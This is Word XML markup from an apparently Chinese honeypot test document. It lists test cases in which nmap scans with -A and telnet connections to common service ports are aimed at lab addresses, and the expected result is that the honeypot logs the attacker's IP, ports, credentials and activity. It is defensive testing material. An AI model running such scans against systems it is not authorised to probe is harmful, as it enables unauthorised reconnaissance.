              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74894A0F" wp14:editId="51EB25FF">
                  <wp:extent cx="4104005" cy="1212850"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="635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99"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1212850"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="194FA45B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="02E6AA1B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="642C3A47"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0FC49076" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>得到攻击的ip、端口号、账号、密码及详细日志等信息。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="53C11804" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="661879DD"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54080BFF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31C33E40" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:r w:rsidRPr="00536672">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="360" w:name="_Toc36487963"/>
      <w:r w:rsidRPr="00536672">
        <w:t>nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="360"/>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3E0BEF5E" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A37ED33"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3E939019" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="008819BA" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AEAAC48"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47E03CC5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>发起攻击，捕获攻击的ip、端口号、账号、密码及详细日志等信息。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="571D7047" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="004FA4FA"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0A78CB57" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>蜜罐功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4F7C469F" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F69338E"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21EB874F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>攻击</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63B2A86E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>攻击方式：</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>nmap -v -p21,23,42,69,88,443,445,1433,1723,1883,1900,1900,2222,3306,5060,5061,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57F46FC8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>5060,8081,9200,11211 -A  192.168.1.197</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5771341B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>攻击</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>后如下</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>图：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CE8D197"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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="451D8DEA" wp14:editId="19DA2187">
                  <wp:extent cx="4104005" cy="657860"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="2540"/>
                  <wp:docPr id="36" name="图片 36" descr="C:\Users\idear\AppData\Local\Temp\15294936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idear\AppData\Local\Temp\1529493654(1).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104005" cy="657860"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ABD6944" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0266A9D0" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DAE1168"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49DEC635"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hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>得到攻击的ip、端口号、账号、密码及详细日志等信息。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="30C1C6B5" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="378D39C6"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3FEE3706" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14F0EC51" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="361" w:name="_Toc36487964"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>低交互攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="361"/>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45E03E58" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79A69BBD"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07B1AA55" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>低交互攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="2F986FD2" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46C48A0A"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7CF073D3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>发起攻击，捕获攻击的ip、端口号、账号、密码及详细日志等信息。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="41E0FBD8" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0606A309"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47A93848" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>蜜罐功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4104497F" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F2A7791"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4B39D74F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>一些低交互攻击</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0505BF41" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>攻击方式：由于都是</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>低交互式，可以使用</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>telnet</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>触发各端口请求。</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>telnet 192.168.1.194 21</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 42</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 69</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 8081</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 443</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 445</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1433</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1723</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1883</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1900</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3306</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 5060</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 5061/ 5060/ 11211</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4886D404" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>暴露端口：</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 42</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 69</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 8081</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 443</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 445</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1433</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1723</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1883</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1900</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3306</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
